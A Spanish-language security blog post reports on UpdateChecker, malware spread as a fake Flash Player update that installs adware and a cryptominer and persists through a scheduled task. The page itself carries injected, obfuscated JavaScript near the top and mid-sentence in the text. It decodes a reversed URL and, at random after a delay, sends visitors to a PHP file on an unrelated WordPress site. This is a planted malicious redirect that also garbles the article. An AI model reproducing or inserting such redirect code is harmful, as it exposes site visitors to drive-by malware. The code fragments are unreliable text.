UPDATECHECKER, falsa actualización de FlashPlayer, adware y criptomonedas
UpdateChecker, un nuevo adware que, además de mostrar publicidad, utiliza tu PC para minar criptomonedas
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>todos.jpg?x=634&y=309″ width=”634″ height=”309″ /><br />
El malware afecta a <script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
todos
Normalmente, cada malware suele tener una finalidad específica según el pirata informático que lo programe. Por ejemplo, últimamente están de moda los software de minado que utilizan el hardware de las víctimas para minar criptomonedas, pero también tenemos los clásicos troyanos, el software espía y el adware, software que muestra molestos anuncios en los equipos de las víctimas para generar ingresos. Aunque generalmente cada tipo suele trabajar individualmente, a veces un tipo de malware suele unirse con otro para poder disponer de muchas más funciones, como ocurre con el nuevo UpdateChecker.
Hace algunas horas, el portal de seguridad BleepingComputer daba a conocer UpdateChecker, un nuevo malware que cuenta, por un lado, con un software de minado de criptomonedas que utiliza la CPU y la GPU de los ordenadores de las víctimas para minar criptomonedas y, por otro lado, con un adware que muestra publicidad en el escritorio de sus víctimas cada 60 minutos.
Este nuevo malware llega a los usuarios, para variar, como una falsa actualización de Flash Player. Cuando la víctima visita una página web creada por los piratas informáticos (y que utiliza, además, certificado HTTPS), esta muestra un mensaje sobre una nueva actualización de Flash. Al pulsar sobre él, se descargará un fichero en nuestro ordenador, que, al ejecutarlo, se conectará a un servidor remoto, controlado por los piratas informáticos, desde el que descargará estos dos malware en el equipo, los guardará en el directorio de Windows Update para no levantar sospechas y los ejecutará.
Este malware está formado por varios ficheros, pero el más importante es el binario “updatechecker.exe”, ya que es el que controla tanto el adware como el software de minado de criptomonedas. Además, el malware se configura para arrancar automáticamente junto al sistema creando una tarea programada llamada “WindowsUpdateChecker”.
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.